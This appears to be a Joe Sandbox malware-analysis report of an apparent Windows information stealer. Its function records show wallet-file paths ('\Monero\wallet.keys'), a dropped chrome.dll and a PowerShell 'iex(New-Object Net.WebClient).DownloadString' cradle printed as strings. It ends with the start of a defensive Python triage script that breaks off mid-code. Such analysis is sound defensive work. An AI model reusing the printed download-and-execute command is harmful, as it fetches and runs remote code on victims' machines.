                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008278C4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008278CB
                              • RegOpenKeyExA.ADVAPI32(80000002,015EB968,00000000,00020119,00827849), ref: 008278EB
                              • RegQueryValueExA.ADVAPI32(00827849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0082790A
                              • RegCloseKey.ADVAPI32(00827849), ref: 00827914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 7de0d6d271ccc661a987797168ec3d95ce7451141b4f63e2747e4092fe444df9
                              • Instruction ID: 1dd605aaa4e4459306eafe2824ae60f1ed2b175f3099dca9b77ade125cb817ce
                              • Opcode Fuzzy Hash: 7de0d6d271ccc661a987797168ec3d95ce7451141b4f63e2747e4092fe444df9
                              • Instruction Fuzzy Hash: F90144B5A44309BBDB00DBD4DC8AFAE7778EB44700F004594F605EA290DB705A418B91
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                              • LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                              • ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                              • LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                              • CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 895e1a13b87ebd8f86da56aef443fde8fdd167267ae8364c26df84a4b03938ce
                              • Instruction ID: d42d913f8863232f0909d335e12d975f5c2ff4aba417ee479e92208e98638ca7
                              • Opcode Fuzzy Hash: 895e1a13b87ebd8f86da56aef443fde8fdd167267ae8364c26df84a4b03938ce
                              • Instruction Fuzzy Hash: 0F31EC74A01209EFDB14CFA4D885FEE77B9FF48314F108159E911AB290D774AA85CFA1
                              APIs
                              • lstrcat.KERNEL32(?,015FDE30), ref: 00824A2B
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 00824A51
                              • lstrcat.KERNEL32(?,?), ref: 00824A70
                              • lstrcat.KERNEL32(?,?), ref: 00824A84
                              • lstrcat.KERNEL32(?,015EB248), ref: 00824A97
                              • lstrcat.KERNEL32(?,?), ref: 00824AAB
                              • lstrcat.KERNEL32(?,015FD178), ref: 00824ABF
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F20: GetFileAttributesA.KERNEL32(00000000,?,00811B94,?,?,0083577C,?,?,00830E22), ref: 00828F2F
                                • Part of subcall function 008247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247D0
                                • Part of subcall function 008247C0: RtlAllocateHeap.NTDLL(00000000), ref: 008247D7
                                • Part of subcall function 008247C0: wsprintfA.USER32 ref: 008247F6
                                • Part of subcall function 008247C0: FindFirstFileA.KERNEL32(?,?), ref: 0082480D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 2cd021a3fba270801996737fffc736d19487ef9fe8b46e00940cf952e8c5737b
                              • Instruction ID: 10c5adba51bef78612279f58f407a2dc468c5f6e29030d901c1c6e212f5bf426
                              • Opcode Fuzzy Hash: 2cd021a3fba270801996737fffc736d19487ef9fe8b46e00940cf952e8c5737b
                              • Instruction Fuzzy Hash: A4315EF2900228A7CF14EBB4EC96EED733CFB58700F404589B70596055EE70A6C9CB95
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00822FD5
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00822F14
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00822F54
                              • <, xrefs: 00822F89
                              • ')", xrefs: 00822F03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 79b4f327ab9a41df0ead627e6c96639b71d5f732cde6bb7fb595ea25869497ff
                              • Instruction ID: dd7d232a9a1975b4e66eabb70bcdc1af089972a4373830cf339a3cc901ba1ede
                              • Opcode Fuzzy Hash: 79b4f327ab9a41df0ead627e6c96639b71d5f732cde6bb7fb595ea25869497ff
                              • Instruction Fuzzy Hash: D241FD71D102289BDB18FBA4E8A2BEDB779FF10310F404459E416F6192DF752A89CF92
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,015FD198,00000000,00020119,?), ref: 00824344
                              • RegQueryValueExA.ADVAPI32(?,015FDFB0,00000000,00000000,00000000,000000FF), ref: 00824368
                              • RegCloseKey.ADVAPI32(?), ref: 00824372
                              • lstrcat.KERNEL32(?,00000000), ref: 00824397
                              • lstrcat.KERNEL32(?,015FDEA8), ref: 008243AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: ec977e48bd2cc4d6ddc3a50bc68548063d4dc89ec304819dced223ee4d685748
                              • Instruction ID: 30932579e06a2e2c41e680cddbea0a2749a5bfbb354e585b5f9c08c70db4a979
                              • Opcode Fuzzy Hash: ec977e48bd2cc4d6ddc3a50bc68548063d4dc89ec304819dced223ee4d685748
                              • Instruction Fuzzy Hash: A54189B69001186BDF14EBE4EC86FEE733DFB98700F004958B7159A181EE7556C98BE2
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: dllmain_raw$dllmain_crt_dispatch
                              • String ID:
                              • API String ID: 3136044242-0
                              • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction ID: 8901e0f5c95e9d4d9dcf319e8bc3c055b2073c42df16aaa5c1227bb8d79d24c0
                              • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction Fuzzy Hash: CA219072D40619AFDB31BF59CD4196F3A7AFB81BA4F054119F909E721AD3308D418BB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827FC7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827FCE
                              • RegOpenKeyExA.ADVAPI32(80000002,015EBB98,00000000,00020119,?), ref: 00827FEE
                              • RegQueryValueExA.ADVAPI32(?,015FD1D8,00000000,00000000,000000FF,000000FF), ref: 0082800F
                              • RegCloseKey.ADVAPI32(?), ref: 00828022
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 924c93fd590918e048e1925f6d47b09261cd50f539e4a0fbb955708078299955
                              • Instruction ID: dbebea748d98d7f0b99f797036c3e2a9f1f4e48166cb02e42f7b35fa934d15c0
                              • Opcode Fuzzy Hash: 924c93fd590918e048e1925f6d47b09261cd50f539e4a0fbb955708078299955
                              • Instruction Fuzzy Hash: F7118FB1A44359EBDB00CBC4ED85FAFBB78FB04B10F104219F615EB290D77558018BA1
                              APIs
                              • StrStrA.SHLWAPI(015FDE18,00000000,00000000,?,00819F71,00000000,015FDE18,00000000), ref: 008293FC
                              • lstrcpyn.KERNEL32(00AE7580,015FDE18,015FDE18,?,00819F71,00000000,015FDE18), ref: 00829420
                              • lstrlen.KERNEL32(00000000,?,00819F71,00000000,015FDE18), ref: 00829437
                              • wsprintfA.USER32 ref: 00829457
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c29223b40fef755dfb8e9aad6b61646cde130cb60b943a36f657c327853a8f41
                              • Instruction ID: 80b199a3a3874d640f89dd9c7b40d9faa0d2a81326f1a4d421dfcf83d19044ab
                              • Opcode Fuzzy Hash: c29223b40fef755dfb8e9aad6b61646cde130cb60b943a36f657c327853a8f41
                              • Instruction Fuzzy Hash: 50011A76504248FFDB04DFA8D998EAE7B78FB48304F108258F9099B204D731AA41DBA0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008112D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
                              • RegCloseKey.ADVAPI32(?), ref: 008112FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: d067b51677965df8960dc3ad43299bb9cb084486bc9abb50c60410ab389b91b3
                              • Instruction ID: 56d53d873c97fe85f0184d4cd9dc7fc7739595b5bb3c2f03d1331436a2c1ad66
                              • Opcode Fuzzy Hash: d067b51677965df8960dc3ad43299bb9cb084486bc9abb50c60410ab389b91b3
                              • Instruction Fuzzy Hash: 9E01CD79A44309BBDB04DFD4DC89FAE7778EB48701F104199FB059B290DA709A418B90
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: c310a4f7ee2afc2721bdf536d9b8b2c7134560e4882eef918663c9ef3393f7db
                              • Instruction ID: bad1618b75dc3cc26016dbe2f5314f9fc1e3e7dfc9fd91f778aaf9f055d622ec
                              • Opcode Fuzzy Hash: c310a4f7ee2afc2721bdf536d9b8b2c7134560e4882eef918663c9ef3393f7db
                              • Instruction Fuzzy Hash: 2C41D7B05047AC9EDB218B289D85FFF7BE8FB45704F1444E8E98AD6182D2719A84DF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00826903
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008269C6
                              • ExitProcess.KERNEL32 ref: 008269F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 78a0164b0d5e1f05de9634144136650c3b9e449899b2ad6f318c1314c39d401f
                              • Instruction ID: 1e83858482dcf6e6bcc0c20e569dcc422bbd2b357f55dd8c64e73706e5124356
                              • Opcode Fuzzy Hash: 78a0164b0d5e1f05de9634144136650c3b9e449899b2ad6f318c1314c39d401f
                              • Instruction Fuzzy Hash: 2F314FB1901228ABDB18EB94ED92FDDB778FF04310F804589F205A6191DF706B89CF56
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830E10,00000000,?), ref: 008289BF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008289C6
                              • wsprintfA.USER32 ref: 008289E0
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 820906f956f6dabe03f9458813b8fff8dfe7027eba2450f472f2588cc020e3af
                              • Instruction ID: 5790a3d0650aad1897e950fba23fe5dc9af8688d9a0b883da82c922ca24f677b
                              • Opcode Fuzzy Hash: 820906f956f6dabe03f9458813b8fff8dfe7027eba2450f472f2588cc020e3af
                              • Instruction Fuzzy Hash: 3D2190B1A04244AFDB00DFD4DC85FAEBBB8FB48701F104119F615AB280CB7559018BA0
                              APIs
                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0081A098
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                              • API String ID: 1029625771-1545816527
                              • Opcode ID: b82a7bd8c5cd60ec9027d74c01addc8fba2777b8b1e1eb9862e53a81c58b2c39
                              • Instruction ID: a9addadfc01f3df59c7d54d5080ad059a779c1f02e51f7f85c5f9a2c30aa475a
                              • Opcode Fuzzy Hash: b82a7bd8c5cd60ec9027d74c01addc8fba2777b8b1e1eb9862e53a81c58b2c39
                              • Instruction Fuzzy Hash: BEF01DB064D284AFD705EBA4EDCCB9A37A8F745704F100424E516DF2A0D2B858C6CB52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008296AE,00000000), ref: 00828EEB
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00828EF2
                              • wsprintfW.USER32 ref: 00828F08
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 9a85c0916c723fedd1e758e88ad909fbb7d0369234e4644d4d5852985bcfaa8f
                              • Instruction ID: e0882ad1549e774044a3604f6fc50095049f4f52faa66c22dbe1f41368133011
                              • Opcode Fuzzy Hash: 9a85c0916c723fedd1e758e88ad909fbb7d0369234e4644d4d5852985bcfaa8f
                              • Instruction Fuzzy Hash: 61E08C70A48308BBDB00CBD4DD4AEAD77B8EB04302F000194FE09CB340DA719E018B91
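The function records in this section list raw API calls with hex arguments (a registry read opened with `80000002` and `00020119`, a `LoadLibraryA` of `C:\ProgramData\chrome.dll`, a `CopyFileA`/`DeleteFileA` pair in a function whose subcalls reference `\Monero\wallet.keys`). The script below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses the `• API.MODULE(args), ref: ADDR` lines into structured calls, decodes the registry hive and REGSAM constants from winreg.h, and applies a few triage heuristics. The rule names, the list of user-writable directories and the selection of sample records (copied from the entries on this page) are the author's assumptions.

```python
"""Triage helper for Joe Sandbox function-analysis records (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Well-known constants from winreg.h / winnt.h.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019   # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
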